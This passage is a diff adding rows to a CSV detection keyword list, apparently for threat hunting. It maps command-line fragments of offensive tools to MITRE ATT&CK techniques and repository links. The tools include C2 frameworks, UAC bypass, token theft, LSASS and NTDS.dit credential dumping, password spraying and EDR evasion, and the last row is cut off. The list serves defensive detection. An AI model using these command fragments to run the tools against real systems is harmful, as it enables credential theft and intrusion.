+"* sshv1.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ssl-ccs-injection.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ssl-cert.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ssl-cert-intaddr.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ssl-date.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ssl-dh-params.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ssl-enum-ciphers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ssl-heartbleed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ssl-known-key.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ssl-poodle.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* sslv2.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* sslv2-drown.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* SspiUacBypass *","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z"
+"* sstp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* st client wss://*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
+"* st teamserver *","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
+"* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -O *.js*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z"
+"* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -process64 *.exe -O *.js*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z"
+"* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -unhook -O *.js*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z"
+"* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -O *.js*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z"
+"* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -unhook -O *.js*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z"
+"* start covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"* start_campaign.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"* start_hidden_process*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"* StayKit.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z"
+"* steal_token /process:* /command:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
+"* stop covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"* striker.py*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z"
+"* stun-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* stun-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* stuxnet-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* supermicro-ipmi-conf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* Supershell.tar.gz*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z"
+"* -sV --script vulners *","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Network Exploitation tools","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* svn-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* SW2_HashSyscall*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"* SweetPotato by @_EthicalChaos*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","0","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" +"* --syscalls GetSyscallStub*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* -syscalls -sleep=*.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - 
T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* --syscalls SysWhispers3*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* -system SYSTEM -ntds NTDS.dit LOCAL*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -system SYSTEM -ntds NTDS.dit -outputfile*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* --syswhispers --jump*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* SysWhispers*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","0","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" +"* -t *https://autodiscover.*/autodiscover/autodiscover.xml*autodiscover*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"* -t 127.0.0.1 -p 1337 *","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" +"* -t BindShell -p *pwned\pipe\spoolss*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"* -t C2concealer *","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - 
T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" +"* -t CreateProcessAsUserW -p *pwned\pipe\spoolss* -e *.exe*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"* -t dcsync://* -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -t donut *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* -t pe2sh*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* -t schtaskbackdoor *","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"* -Target * -AllDomain 
*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Target * -InitialGrooms *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
